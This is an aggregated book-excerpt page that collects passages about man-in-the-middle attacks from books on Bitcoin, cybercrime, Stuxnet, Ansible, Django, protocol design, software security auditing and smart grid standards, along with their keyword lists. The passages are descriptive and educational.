Data Universal Numbering System, a government-assigned code that is unique to every business in most of the world and identifies that business for financial purposes. 2. https://en.bitcoin.it/wiki/How_to_accept_Bitcoin,_for_small_businesses#Merchant_Services 3. Black hat hackers, as opposed to white hat hackers, are hackers who have no moral qualms about profiting from and harming their targets. 4. If you don’t understand what a man-in-the-middle attack is, first, be aware that almost anything you do on the Internet is at risk of this assault, especially if you’re connecting from a public Internet connection you don’t fully control. Second, stop reading this chapter now and immediately read the Wikipedia page on this subject at https://en.wikipedia.org/wiki/Man-in-the-middle_attack. Appendix B: Bitcoin Programming with Bitcoinj 1. The C++ reference implementation is available at https://github.com/bitcoin/bitcoin/. 2. BitcoinJ is available at http://bitcoinj.github.io/ 3. https://github.com/piotrnar/gocoin/ 4. https://github.com/conformal/btcd/ UPDATES Visit http://www.nostarch.com/bitcoin for updates, errata, and other information.

Most important, be aware that we’re using community-maintained source code in our examples; if a clever black hat hacker3 manages to insert some rogue code into the official library repositories, he or she can steal all your money. Even if you understand the library code perfectly, you run the risk of jeopardizing the safety of your money. For example, as you’re downloading this library code from the Internet, a black hat hacker has many opportunities to perform a man-in-the-middle attack4 and insert rogue code into a doctored version of the library that is incorporated into your program. As a result, the hacker can steal all your money. Additionally, as mentioned in earlier chapters, hackers can steal your bitcoins in many other ways that aren’t specific to Bitcoin programming. In a few years, if the current popularity of Bitcoin continues, we suspect most computer viruses will include code that immediately empties any Bitcoin wallets they find.

program, 217–218, 220–222 hello-money starter project creating, 228–229 declarations, 231 hook for detecting money arrival, 234 running and testing, 235–236 writing code, 230–235 hierarchical deterministic wallets, 190 Hill, Austin, 120 history of Bitcoin, 112–116 homebrew (command-line tool), 219 hosted wallets online services, 36 vs. personal wallets, 34–35 hot storage, 47 vs. cold storage, 33–34 hot wallets, personal, 37–38 human-readable Bitcoin addresses, 10n hybrid wallets, 187 I illegal activity, Bitcoin and, 124 impedance mismatch, 57 importing private key, 17, 39, 193, 194–195, 237 installing SPV wallets vs. full wallets, 193 integer factorization, 131 Internet bubble, 120 InterruptedException exception type, 239 irreversibility, of transactions, 25–26, 56 superiority of, 57 J Java, 226 initializing objects, 231–233 installing, 226–227 java.io.File class, 231 Java JDK (Java Development Kit), 226 java.matho.BigInteger class, 231 JavaScript, 213–223 preparing machine for, 218–219 writing Bitcoin program in, 217–218 jelly-filled donut incident, 141–156 JSON-RPC API (JavaScript Object Notation - Remote Protocol Call), 222 limitations of writing Bitcoin programs using, 223 JSON-RPC protocol, 214 K Kaminsky, Dan, 118 Keynesian economics, 126 Kienzle, Jörg, 110–111 Koblitz curve, 151 Kraken, 64 Krugman, Paul, 117 L Landauer limit, 157 laptops, private keys on, 44 ledger, 11 length extension, 171n liability, for stolen bitcoins, 34 lightweight wallets, 192 limit orders, 66 Linux installing Git, 227 installing Maven, 227 OpenJDK version of Java, 227 setting up Bitcoin Core server, 219 live Bitcoin exchanges, 71 LocalBitcoins.com, 67, 68 escrow service, 70 M Mac OS installing Git, 227 installing Maven, 227 setting up Bitcoin Core server, 219 man-in-the-middle attacks, 216 market orders, 65–66 MasterCard, 112 master private key, 188 master public key, 188 generating Bitcoin address with, 190 Maven empty starter project created with, 228 installing, 227 mBTC (millibitcoins), 9 MD5 (message digest algorithm), 132 meeting places, for Bitcoin transactions, 68 MemoryBlockStore function (bitcoinJ), 237 merchant services, 214 Merkle trees, 192 mesh networks, 169 message digest algorithm (MD5), 132 microbitcoins (µBTC), 9 middleman, buying bitcoins from, 52–57 Miller-Rabin primality test, 90 millibitcoins (mBTC), 9 mining, 5, 20, 26–27, 96, 99, 161–180 in 2030, 201–202 decentralization of, 179–180 difficulty of, 173 distributing new currency with, 167–168 hardware, 174–175 2030 requirements, 202 energy efficiency of, 178 profitability threshold curves for comparing, 179 need for, 162–168 nodes, 170 pooled, 175–176 practicality, 50 preventing attacks with, 166–167 process for, 168–176 for profit, 176–177 proof-of-work in, 138–139 solving a block, 171 modular arithmetic, 131n “m of n” private key, 42 money laundering, 112–113 Moore’s law, 179n Moxie Jean, 67 Multibit, 38 multi-signature addresses, and fragmented private keys, 41–42 multi-signature transactions, 57, 69–70 mvn install command, 230 My Wallet Service, 37 N Nakamoto, Satoshi, 3, 110, 211 identity, 113 last comment, 114 white paper on Bitcoin, 112 network effect, 120 NetworkParameters structure, 232 newbiecoins.com, 13 newly minted bitcoins, 26–27 Newton, Isaac, Principia, 210–211 node-bitcoin, installing, 218 Node.js library, 217, 221 installing, 218 Node Package Manager, 218 nodes broadcast only, 169 full, 191 relay, 170 nominal deflation, 126 nonprofit organizations, accepting bitcoins, 18 NXT, 125 O off-chain transactions, 201 offline transaction signing, 40–41 onCoinsReceived function, 234–235 online wallet services hosted, 36 personal, 34, 37 Oracle Corporation, 226 orders, placing to buy bitcoins, 65 order of curve, elliptic curve cryptography, 152–153 orphaned blocks, 24–25 P paper money, color copiers as threat, 110 paper wallets, 39 encrypted, 39–40 passwords, 14, 40 for brain wallet, 45 function of, 40 loss of, 37 Peercoin, 125 PeerGroup object, 233–234, 240 peer-to-peer architecture, 119 pegging, 120 pending transaction, 18 Perrig, Adrian, 110–111 personal wallets vs. hosted wallet, 34–35 hot storage, 37–38 online services, 37 person-to-person bitcoin purchases, 52, 67–71 point multiplication, 150, 158–159 point-of-sale terminals, watch-only wallet for, 187 polling, Bitcoin programming, 223 pom.xml file, 229, 236–237 pooled mining, 175–176 portability, of currency, 117 Preneel, Bart, 140 price discovery process, 120 privacy, 11n and criminals, 124 multiple addresses and, 12 private currencies, 2 private key, 11–12, 150 compromise of, 41 extra protection for, 139 fragmented, and multi-signature addresses, 41–42 generating, 37 importing, 237 master, 188 memorizing, 45 parable on, 141–145 reversing function of, 136 security for, 39, 186 signing transaction with, 156 SPV wallets vs. full wallets, 194 storing, 33 profit, mining for, 176–177 programming languages, for Bitcoin network connection, 225–226 proof-of-stake, 125 proof-of-work, 125, 166 and blockchain, 165 in mining, 138–139 protecting bitcoins, 61.


pages: 677 words: 206,548

Future Crimes: Everything Is Connected, Everyone Is Vulnerable and What We Can Do About It by Marc Goodman

23andMe, 3D printing, active measures, additive manufacturing, Affordable Care Act / Obamacare, Airbnb, airport security, Albert Einstein, algorithmic trading, artificial general intelligence, Asilomar, Asilomar Conference on Recombinant DNA, augmented reality, autonomous vehicles, Baxter: Rethink Robotics, Bill Joy: nanobots, bitcoin, Black Swan, blockchain, borderless world, Brian Krebs, business process, butterfly effect, call centre, Charles Lindbergh, Chelsea Manning, cloud computing, cognitive dissonance, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, data acquisition, data is the new oil, Dean Kamen, disintermediation, don't be evil, double helix, Downton Abbey, drone strike, Edward Snowden, Elon Musk, Erik Brynjolfsson, Filter Bubble, Firefox, Flash crash, future of work, game design, global pandemic, Google Chrome, Google Earth, Google Glasses, Gordon Gekko, high net worth, High speed trading, hive mind, Howard Rheingold, hypertext link, illegal immigration, impulse control, industrial robot, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Jaron Lanier, Jeff Bezos, job automation, John Harrison: Longitude, John Markoff, Joi Ito, Jony Ive, Julian Assange, Kevin Kelly, Khan Academy, Kickstarter, knowledge worker, Kuwabatake Sanjuro: assassination market, Law of Accelerating Returns, Lean Startup, license plate recognition, lifelogging, litecoin, low earth orbit, M-Pesa, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, mobile money, more computing power than Apollo, move fast and break things, move fast and break things, Nate Silver, national security letter, natural language processing, obamacare, Occupy movement, Oculus Rift, off grid, offshore financial centre, optical character recognition, Parag Khanna, pattern recognition, peer-to-peer, personalized medicine, Peter H. Diamandis: Planetary Resources, Peter Thiel, pre–internet, RAND corporation, ransomware, Ray Kurzweil, refrigerator car, RFID, ride hailing / ride sharing, Rodney Brooks, Ross Ulbricht, Satoshi Nakamoto, Second Machine Age, security theater, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, smart grid, smart meter, Snapchat, social graph, software as a service, speech recognition, stealth mode startup, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, Stuxnet, supply-chain management, technological singularity, telepresence, telepresence robot, Tesla Model S, The Future of Employment, The Wisdom of Crowds, Tim Cook: Apple, trade route, uranium enrichment, Wall-E, Watson beat the top human players on Jeopardy!, Wave and Pay, We are Anonymous. We are Legion, web application, Westphalian system, WikiLeaks, Y Combinator, zero day

Not only did the NSA have cooperative relationships with American firms, but it also targeted them when convenient, including Google and Yahoo!, whose data centers the spy agency infiltrated without authorization. Using the same basic techniques employed by hackers and organized crime groups, the NSA infected more than fifty thousand computer networks around the world with malicious software in order to get access to targets of interest. The agency even posed as Facebook in numerous “man in the middle” attacks to pursue individuals across their social networks. The technique caused targets of interest to connect through a replica Facebook site controlled by the government, allowing the agency to install malware on the machines of its marks. The NSA did not do all this work by itself, but rather cooperated with sister organizations such as Britain’s NSA equivalent, the Government Communications Headquarters.

The same would be true if somebody maliciously erased your allergy to penicillin from your digital chart and a nurse innocuously carried out a medical order directing her to inject five hundred milligrams of the drug into your IV. The profound consequences of the “in screen we trust” mentality can open the door to an array of new crimes, including new ways to commit murder. In response, criminals have developed a panoply of methodologies to profit from a world that has subsumed human intelligence in favor of the digital and the virtual. Nefarious actors are proving particularly adept at so-called man-in-the-middle attacks, wherein they insert themselves between reality and the data we see on our screens. The result? An all-out assault on the integrity of the information we’re stockpiling as a result of the big-data revolution. Screen of the Crime For every screen in your life, criminals have developed a plan of attack. One of the most common such scams on the Internet is the phenomenon of phishing—a technique by which criminals masquerade as a legitimate Web site in order to acquire information such as passwords and credit card numbers.

Thus, if the thieves stole $2,419 from your checking account, an algorithm will add that portion back to what you see on your screen in real time as you view your online account balance. Purchases made by criminals with your credit or debit card are automatically struck from the recent transactions list and the online statement before they appear on your screen. Even PDF copies of your banking and credit card transactions sent to your printer are modified before they come out of your machine. When these thieves own you, they really own you. These types of man-in-the-middle attacks are powerful reminders that criminal hackers are perfectly capable of intermediating reality for you via the ever-increasing number of screens in your life. Just like the perpetrators of Stuxnet, these criminals recognize that screens are merely a proxy for reality, one that is completely malleable and easily manipulated. Yet not all manipulation of the data we see on our screens is carried out by global cyber-crime cartels or espionage services.


pages: 394 words: 117,982

The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age by David E. Sanger

active measures, autonomous vehicles, Bernie Sanders, bitcoin, British Empire, call centre, Cass Sunstein, Chelsea Manning, computer age, cryptocurrency, cuban missile crisis, Donald Trump, drone strike, Edward Snowden, Google Chrome, Google Earth, Jacob Appelbaum, John Markoff, Mark Zuckerberg, MITM: man-in-the-middle, mutually assured destruction, RAND corporation, ransomware, Sand Hill Road, Silicon Valley, Silicon Valley ideology, Skype, South China Sea, Steve Jobs, Steven Levy, Stuxnet, Tim Cook: Apple, too big to fail, undersea cable, uranium enrichment, Valery Gerasimov, WikiLeaks, zero day

But he may have also done us a favor by forcing Washington and the new giants of the Internet—Google, Facebook, Microsoft, Intel—to rethink their relationship with the US government as well. CHAPTER IV MAN IN THE MIDDLE No hard feelings, but my job is to make their job hard. —Eric Grosse, Google’s head of security, talking about the NSA It was the smiley face that got to the engineers at Google. The face was drawn at the bottom of a handwritten diagram on yellow paper that looked a bit like something an engineer might sketch at a coffee shop—save for the fact that it was on a slide marked TOP SECRET//SI//NOFORN and included in Snowden’s trove of leaked documents. The diagram revealed that the NSA was trying, maybe successfully, to insert itself in the nexus between the “Public Internet” and the “Google Cloud” in a move called a “man in the middle” attack. In other words, everything that went into and came out of Google’s international data centers, connecting its customers around the world, could be intercepted.

ISBN 9780451497895 Ebook ISBN 9780451497918 Cover design by Oliver Munday v5.3.1 ep For Sherill, whose love and talent make all the wonderful things in life happen CONTENTS Cover Title Page Copyright Dedication PREFACE PROLOGUE: FROM RUSSIA, WITH LOVE CHAPTER I: ORIGINAL SINS CHAPTER II: PANDORA’S INBOX CHAPTER III: THE HUNDRED-DOLLAR TAKEDOWN CHAPTER IV: MAN IN THE MIDDLE CHAPTER V: THE CHINA RULES CHAPTER VI: THE KIMS STRIKE BACK CHAPTER VII: PUTIN’S PETRI DISH CHAPTER VIII: THE FUMBLE CHAPTER IX: WARNING FROM THE COTSWOLDS CHAPTER X: THE SLOW AWAKENING CHAPTER XI: THREE CRISES IN THE VALLEY CHAPTER XII: LEFT OF LAUNCH AFTERWORD ACKNOWLEDGMENTS NOTES PREFACE A year into Donald J.

Still, intelligence leaders were unapologetic: Mark Landler and Michael Schmidt, “Spying Known at Top Levels, Officials Say,” New York Times, October 30, 2013, www.nytimes.com/2013/10/30/world/officials-say-white-house-knew-of-spying.html. “way beyond so-called domestic surveillance”: Eli Lake, “Spy Chief James Clapper: We Can’t Stop Another Snowden,” Daily Beast, February 23, 2014, www.thedailybeast.com/spy-chief-james-clapper-we-cant-stop-another-snowden. CHAPTER IV: MAN IN THE MIDDLE When the Washington Post first published the slide: Barton Gellman and Ashkan Soltani, “NSA Infiltrates Links to Yahoo, Google Data Centers Worldwide, Snowden Documents Say,” Washington Post, October 30, 2013, www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html?


pages: 761 words: 80,914

Ansible: Up and Running: Automating Configuration Management and Deployment the Easy Way by Lorin Hochstein

Amazon Web Services, cloud computing, continuous integration, Debian, DevOps, domain-specific language, don't repeat yourself, general-purpose programming language, Infrastructure as a Service, job automation, MITM: man-in-the-middle, pull request, side project, smart transportation, web application

The output was: OpenSSH_6.2p2, OSSLShim 0.9.8r 8 Dec 2011 debug1: Reading configuration data /etc/ssh_config debug1: /etc/ssh_config line 20: Applying options for * debug1: /etc/ssh_config line 102: Applying options for * debug1: auto-mux: Trying existing master debug1: Control socket "/Users/lorinhochstein/.ansible/cp/ansible-ssh-127.0.0.1- 2222-vagrant" does not exist debug2: ssh_connect: needpriv 0 debug1: Connecting to 127.0.0.1 [127.0.0.1] port 2222. debug2: fd 3 setting O_NONBLOCK debug1: connect to address 127.0.0.1 port 2222: Connection refused ssh: connect to host 127.0.0.1 port 2222: Connection refused If you have host key verification enabled, and the host key in ~/.ssh/known_hosts doesn’t match the host key of the server, then using -vvvv will output an error that looks like this: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that a host key has just been changed. The fingerprint for the RSA key sent by the remote host is c3:99:c2:8f:18:ef:68:fe:ca:86:a9:f5:95:9e:a7:23. Please contact your system administrator. Add correct host key in /Users/lorinhochstein/.ssh/known_hosts to get rid of this message. Offending RSA key in /Users/lorinhochstein/.ssh/known_hosts:1 RSA host key for [127.0.0.1]:2222 has changed and you have requested strict checking.

Cloning as root and changing permissions - name: verify the config is valid sudoers file local_action: command visudo -cf files/99-keep-ssh-auth-sock-env sudo: True - name: copy the sudoers file so we can do agent forwarding copy: > src=files/99-keep-ssh-auth-sock-env dest=/etc/sudoers.d/99-keep-ssh-auth-sock-env owner=root group=root mode=0440 validate='visudo -cf %s' sudo: True - name: check out my private git repository git: repo=git@github.com:lorin/mezzanine-example.git dest={{ proj_path }} sudo: True - name: set file ownership file: > path={{ proj_path }} state=directory recurse=yes owner={{ user }} group={{ user }} sudo: True Host Keys Every host that runs an SSH server has an associated host key. The host key acts like a signature that uniquely identifies the host. Host keys exist to prevent man-in-the-middle attacks. If you’re cloning a Git repository over SSH from GitHub, you don’t really know whether the server that claims to be github.com is really GitHub’s server, or is an impostor that used DNS spoofing to pretend to be github.com. Host keys allow you to check that the server that claims to be github.com really is github.com. This means that you need to have the host key (a copy of what the signature should look like) before you try to connect to the host.

Recall in Chapter 6 how the git module took an accept_hostkey parameter: - name: check out the repository on the host git: repo={{ repo_url }} dest={{ proj_path }} accept_hostkey=yes The git module can hang when cloning a Git repository using the SSH protocol if host key checking is enabled on the host and the Git server’s SSH host key is not known to the host. The simplest approach is to use the accept_hostkey parameter to tell Git to automatically accept the host key if it isn’t known, which is the approach we use in Example 6-5. Many people simply accept the host key and don’t worry about these types of man-in-the-middle attacks. That’s what we did in our playbook, by specifying accept_hostkey=yes as an argument when invoking the git module. However, if you are more security conscious and don’t want to automatically accept the host key, then you can manually retrieve and verify GitHub’s host key, and then add it to the system-wide /etc/ssh/known_hosts file or, for a specific user, to the user’s ~/.ssh/known_hosts file.


Django Book by Matt Behrens

Benevolent Dictator For Life (BDFL), create, read, update, delete, database schema, distributed revision control, don't repeat yourself, en.wikipedia.org, Firefox, full text search, loose coupling, MITM: man-in-the-middle, MVC pattern, revision control, Ruby on Rails, school choice, slashdot, web application

Django has built-in tools to protect from this kind of attack. Both the attack itself and those tools are covered in great detail in Chapter 16. Session Forging/Hijacking This isn’t a specific attack, but rather a general class of attacks on a user’s session data. It can take a number of different forms: A man-in-the-middle attack, where an attacker snoops on session data as it travels over the wire (or wireless) network. Session forging, where an attacker uses a session ID (perhaps obtained through a man-in-the-middle attack) to pretend to be another user. An example of these first two would be an attacker in a coffee shop using the shop’s wireless network to capture a session cookie. She could then use that cookie to impersonate the original user. A cookie-forging attack, where an attacker overrides the supposedly read-only data stored in a cookie.

This means that developers should check that a user actually accepts cookies before relying on them. Cookies (especially those not sent over HTTPS) are not secure. Because HTTP data is sent in cleartext, cookies are extremely vulnerable to snooping attacks. That is, an attacker snooping on the wire can intercept a cookie and read it. This means you should never store sensitive information in a cookie. There’s an even more insidious attack, known as a man-in-the-middle attack, wherein an attacker intercepts a cookie and uses it to pose as another user. Chapter 20 discusses attacks of this nature in depth, as well as ways to prevent it. Cookies aren’t even secure from their intended recipients. Most browsers provide easy ways to edit the content of individual cookies, and resourceful users can always use tools like mechanize (http://wwwsearch.sourceforge.net/mechanize/) to construct HTTP requests by hand.

Although it’s nearly impossible to detect someone who’s hijacked a session ID, Django does have built-in protection against a brute-force session attack. Session IDs are stored as hashes (instead of sequential numbers), which prevents a brute-force attack, and a user will always get a new session ID if she tries a nonexistent one, which prevents session fixation. Notice that none of those principles and tools prevents man-in-the-middle attacks. These types of attacks are nearly impossible to detect. If your site allows logged-in users to see any sort of sensitive data, you should always serve that site over HTTPS. Additionally, if you have an SSL-enabled site, you should set the SESSION_COOKIE_SECURE setting to True; this will make Django only send session cookies over HTTPS. E-mail Header Injection SQL injection’s less well-known sibling, e-mail header injection, hijacks Web forms that send e-mail.


pages: 171 words: 54,334

Barefoot Into Cyberspace: Adventures in Search of Techno-Utopia by Becky Hogge, Damien Morris, Christopher Scally

A Declaration of the Independence of Cyberspace, back-to-the-land, Berlin Wall, Buckminster Fuller, Chelsea Manning, citizen journalism, cloud computing, corporate social responsibility, disintermediation, Douglas Engelbart, Douglas Engelbart, Electric Kool-Aid Acid Test, Fall of the Berlin Wall, game design, Hacker Ethic, informal economy, information asymmetry, Jacob Appelbaum, jimmy wales, John Markoff, Julian Assange, Kevin Kelly, mass immigration, Menlo Park, Mitch Kapor, MITM: man-in-the-middle, moral panic, Mother of all demos, Naomi Klein, Nelson Mandela, Network effects, New Journalism, Norbert Wiener, peer-to-peer, Richard Stallman, Silicon Valley, Skype, Socratic dialogue, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, technoutopianism, Telecommunications Act of 1996, The Hackers Conference, Vannevar Bush, Whole Earth Catalog, Whole Earth Review, WikiLeaks

The hack has come good: after several hundred man hours have been put into constructing rainbow tables, the weak cryptography that protects the standard has been cracked. The implications are serious – a fairly simply hack has turned the world’s network of over three billion GSM mobile phones into the most widely deployed privacy threat on the planet. Karsten is offhand as he underlines the implications of his work in the introduction to his talk: Cloning, spoofing, man-in-the-middle, decrypting, sniffing, crashing, DoSing, or just plain having fun. If you can work a BitTorrent client and a standard GNU build process then you can do it all, too. Prepare to change the way you look at your cell phone, forever. If all this sounds like bragging jargon, then listen to how the BBC report the breakthrough: “The work could allow anyone – including criminals – to eavesdrop on private phone conversations”.

IM: Instant Message ISP: Internet Service Provider La Quadrature du Net: France-based organisation that works to preserve digital rights and freedoms Mailman: A computer software application for managing electronic mailing lists MAME: MAME (an acronym of Multiple Arcade Machine Emulator) is an emulator application designed to recreate the hardware of arcade game systems in software on modern personal computers and other platforms. man-in-the-middle: A form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. MIT: Massachusetts Institute of Technology n00bie: Hacker jargon for “newbie” NORAD: North American Aerospace Defense Command ONI: Open Net Initiative Open Rights Group (ORG): UK-based organisation that works to preserve digital rights and freedoms open source: Practices in production and development that promote access to the end products source materials ORG: See Open Rights Group paywall: A paywall blocks access to a webpage with a screen requiring payment.


pages: 492 words: 153,565

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter

Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, Firefox, friendly fire, Google Earth, information retrieval, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, Maui Hawaii, MITM: man-in-the-middle, pre–internet, RAND corporation, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day

Similarly, in the case of control systems, Langner had expected hackers would start out with simple denial-of-service attacks—sending a stop command to a PLC to halt whatever process it controlled—then escalate to logic bombs and other simple techniques to alter settings. But Stuxnet bypassed the rudimentary stages of development and jumped straight into one of the most sophisticated attacks someone could devise against a PLC. Of everything that Langner saw in the code, it was the man-in-the-middle attack against the safety system and operator monitoring stations that really blew his mind. The way Stuxnet smoothly disabled the former and deviously recorded the normal operations of the PLC to play them back to operators during the attack was astounding to him—the digital equivalent of a six-ton circus elephant performing a one-legged handstand. It was a level of grace and finesse he’d never seen or even considered possible.

One of the first things that struck him about the attack was that it unfolded in six stages that repeated over weeks and months. Once the attack was done, it recycled itself and began again. This meant that rather than launching a single blow that caused catastrophic failure, as the researchers originally believed Stuxnet was designed to do, the attackers were going for subtle sabotage that extended over time. This, combined with the man-in-the-middle attack that concealed the sabotage from operators as it occurred, would have made it hard for anyone to detect and pinpoint the source of problems. The attackers, Falliere realized, had expected to go undetected for months, and indeed they had. The first part of the attack, a reconnaissance stage, lasted about thirteen days, during which Stuxnet sat silently on the PLC recording normal operations in order to loop that data back to operators when the sabotage began.

After the initial reconnaissance stage recording data for thirteen days, Stuxnet first increased the frequency of the converters to 1,410 Hz for fifteen minutes, then reduced it to 1,064 Hz, presumably the normal operating frequency, for about twenty-six days. Once Stuxnet recorded all of the data it needed to record during these three weeks, it dropped the frequency drastically to 2 Hz for fifty minutes, before restoring it to 1,064 Hz again. After another twenty-six days, the attack began again. Each time the sabotage commenced, the man-in-the-middle attack fed false frequency readings back to the operators and safety system to keep them blind to what was happening. SYMANTEC AT LAST knew exactly what Stuxnet was doing to the S7-315 PLC. But the attack targeting the S7-417 PLC remained a mystery. The two digital weapons arrived with the same missile but operated completely independent of each other. The S7-417 was Siemens’s high-end PLC, which came with 30 megabytes of RAM and a price tag of more than $10,000 compared to about $500 for the S7-315.


Principles of Protocol Design by Robin Sharp

accounting loophole / creative accounting, business process, discrete time, fault tolerance, finite state, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, packet switching, RFC: Request For Comment, stochastic process

The shared secret which can be evaluated by both A and B after this exchange is: K = α xA ·xB mod q which is used as the new secret key. Note that A’s personal secret xA is not revealed directly to B (or to any adversaries who may be listening), and it is computationally 6.5 Key Exchange a) KA A 185 B α xA α xA xB b) KA α xB A α xA xB B M α xA KB KB α xA α xB α xA xB α x A xB α xB Fig. 6.14 An attack on the Diffie-Hellman protocol. (a) Normal operation; (b) During man-in-the-middle attack Protocol 26 Message 1 A → B : α xA mod q Message 2 B → A : (α xB mod q, {SB (α xB , α xA )}K ) Message 3 A → B : {SA (α xB , α xA )}K Fig. 6.15 Station-to-Station key agreement protocol. Here, α is a publicly known integer which is a primitive root of a publicly known prime q, and xA and xB are secret integers known only to A and B respectively. K is the secret key evaluated as α xA xB mod q by both A and B, Si (m) denotes message m digitally signed by party i, and {m}k denotes message m encrypted with key k.

This protocol sends an encrypted, signed copy of the exponentials used 186 6 Security to evaluate the shared secret key together with the exponentials themselves. This enables the recipients to check the integrity and source of the received information. As in the three-way handshake and similar protocols, the third message confirms to B that the new key K is actually shared with A. These additional features protect the protocol against the simple man-in-the-middle attack shown in Figure 6.14. However, users of the protocol should still take care, as you will see if you try to solve Exercise 6.9. You should never underestimate the difficulty of designing a correct and secure key exchange protocol! 6.6 Non-cryptographic Methods Not all forms of security can be provided solely by the use of cryptographic methods. Some other – rather obvious – techniques are: Traffic padding used to produce a constant flow of traffic between users of a service so that information about traffic flow cannot be used to deduce the level of activity of the users.

When certificates are used to provide authentication, it is important that a certificate can be revoked if it is no longer valid – for example, if the key which it contains is known to be compromised, or if the owner of the certificate ceases to exist. Suggest a suitable protocol for dealing with revocation in the case of a system with multiple certification authorities, based on an hierarchical trust model. 6.9. The Station-to-Station protocol given as Protocol 26 is sensitive to a type of man-in-the-middle attack in which the attacker changes the first message from A to B, so that it looks as though it came from a third party, C. (Technically, this can be done by changing the sender address in the PDU.) B then replies to the intruder, Exercises 189 who sends the reply on to A. When A sends its third message, it belives that it is talking to B, whereas B believes it is talking to C. Suggest ways of avoiding this type of attack.


pages: 2,054 words: 359,149

The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities by Justin Schuh

Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, bash_history, business process, database schema, Debian, defense in depth, en.wikipedia.org, Firefox, information retrieval, iterative process, loose coupling, MITM: man-in-the-middle, MVC pattern, RFC: Request For Comment, slashdot, web application

Key Exchange Algorithms Key exchange protocols can get complicated, so this section just provides some simple points to keep in mind. First, the implementation should use a standard key exchange protocol, such as RSA, Diffie-Hellman, or El Gamal. These algorithms have been extensively validated and provide the best degree of assurance. The next concern is that the key exchange is performed in a secure manner, which means both sides of the communication must provide some means of identification to prevent man-in-the-middle attacks. All the key exchange algorithms mentioned previously provide associated signature algorithms that can be used to validate both sides of the connection. These algorithms require that both parties have already exchanged public keys or that they are available through some trusted source, such as a Public Key Infrastructure (PKI) server. Common Vulnerabilities of Encryption Now that you have some background on the proper use of encryption, it’s important to understand what can go wrong.

If that same site is on the public Internet with a developer-signed certificate, however, it’s no longer realistic to assume you can get that certificate to all potential clients. The client, therefore, has no way of knowing whether the certificate can be trusted. If users browse to the site, they get an error message stating that the certificate isn’t signed by a trusted authority; the only option is to accept the untrusted certificate or terminate the connection. An attacker capable of spoofing the server could exploit this situation to stage man-in-the-middle attacks and then hijack sessions or steal credentials. Network Profiles An application’s network profile is a crucial consideration when you’re reviewing operational security. Protocols such as Network File System (NFS) and Server Message Block (SMB) are acceptable inside the corporate firewall and generally are an absolute necessity. However, these same types of protocols become an unacceptable liability when they are exposed outside the firewall.

Therefore, you need to see whether there’s any way to break that encryption. In performing an audit, often you assume the effectiveness of a publicly validated encryption protocol. However, that doesn’t necessarily mean the protocol is being used safely. You might want to look at session establishment and see whether an observer can learn secret keys from watching a proposal and session setup. Man in the middle—Can an observer masquerade as a server and glean login credentials from clients without their knowledge? Protocol quirks—What interesting quirks does the protocol allow? For example, does it provide backward compatibility with previous, less secure versions of the protocol? If so, undermining security by forcing the use of old protocol features or authentication mechanisms might be possible.


Smart Grid Standards by Takuro Sato

business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, energy security, factory automation, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport

The goal of the attacker is to decrease the availability of the system for its intended purpose. • Eavesdropping: The goal of the attacker is to violate the confidentiality of the communication, for example, by sniffing packets on the local area network (LAN) or by intercepting wireless transmissions. • Man-in-the-middle attack: In a man-in-the-middle attack, the attacker acts toward both end points of the communication as if the attacker was the expected, legitimate partner. In addition to confidentiality violations, this also allows modifying the exchanged messages (integrity). Via man-in-the-middle attacks, weaknesses in the implementation or usage of certain key exchange and authentication protocols can be exploited to gain control even over encrypted sessions. • Virus: A virus-based attack manipulates a legitimate user to bypass authentication and access control mechanisms in order to execute the malicious code injected by the attacker.

